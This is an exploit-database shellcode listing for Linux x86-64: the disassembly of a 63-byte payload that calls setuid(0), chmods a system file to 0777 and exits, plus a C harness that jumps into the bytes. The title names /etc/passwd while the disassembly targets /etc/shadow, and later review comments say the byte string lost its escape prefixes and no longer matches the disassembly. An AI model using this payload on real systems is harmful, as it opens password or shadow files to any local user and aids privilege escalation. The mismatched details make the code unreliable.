# Title : Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes
# Published : 2010-06-17
# Author : Jonathan Salwan
/*
Title: Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes
Date: 2010-06-17
Tested: Archlinux x86_64 k2.6.33
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/shell_storm
! Database of shellcodes http://www.shell-storm.org/shellcode/
<-- _setuid(0) -->
400078: 48 31 ff xor %rdi,%rdi
40007b: 48 31 c0 xor %rax,%rax
40007e: b0 69 mov $0x69,%al
400080: 0f 05 syscall
<-- _chmod("/etc/shadow", 0777) -->
400082: 48 31 d2 xor %rdx,%rdx
400085: 66 be ff 01 mov $0x1ff,%si
400089: 48 bb ff ff ff ff ff mov $0x776f64ffffffffff,%rbx
400090: 64 6f 77
400093: 48 c1 eb 28 shr $0x28,%rbx
400097: 53 push %rbx
400098: 48 bb 2f 65 74 63 2f mov $0x6168732f6374652f,%rbx
40009f: 73 68 61
4000a2: 53 push %rbx
4000a3: 48 89 e7 mov %rsp,%rdi
4000a6: 48 31 c0 xor %rax,%rax
4000a9: b0 5a mov $0x5a,%al
4000ab: 0f 05 syscall
<-- _exit(0) -->
4000ad: 48 31 ff xor %rdi,%rdi
4000b0: 48 31 c0 xor %rax,%rax
4000b3: b0 3c mov $0x3c,%al
4000b5: 0f 05 syscall
*/
#include <stdio.h>
#include <string.h>
/*
 * Payload bytes as a string literal (compare with the disassembly above).
 * NOTE(review): as reproduced on this page the escape prefixes were lost,
 * so SC is plain ASCII text (189 characters), not the 63-byte sequence
 * the disassembly lists; strlen(SC) in main() reflects that.
 */
char *SC = "x48x31xffx48x31xc0xb0x69x0fx05"
"x48x31xd2x66xbexffx01x48xbbxff"
"xffxffxffxffx64x6fx77x48xc1xeb"
"x28x53x48xbbx2fx65x74x63x2fx73"
"x68x61x53x48x89xe7x48x31xc0xb0"
"x5ax0fx05x48x31xffx48x31xc0xb0"
"x3cx0fx05";
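/*
 * Harness entry point: print the length of SC, then transfer control to it.
 *
 * The indirect call treats a string literal as code, which is undefined
 * behavior in ISO C; on a default toolchain string literals are placed in
 * read-only, non-executable memory, so under NX / W^X the call faults
 * rather than running. As reproduced on this page the escape prefixes in
 * SC were lost, so strlen() reports the ASCII text length, not 63.
 *
 * Returns 0 only if control ever comes back from the call.
 */
int main(void)
{
    /* %zu matches size_t; the original "%d" did not, which is UB. */
    fprintf(stdout, "Length: %zu\n", strlen(SC));
    /* Full prototype in the cast instead of the obsolescent "()" form. */
    ((void (*)(void)) SC)();
    return 0;
}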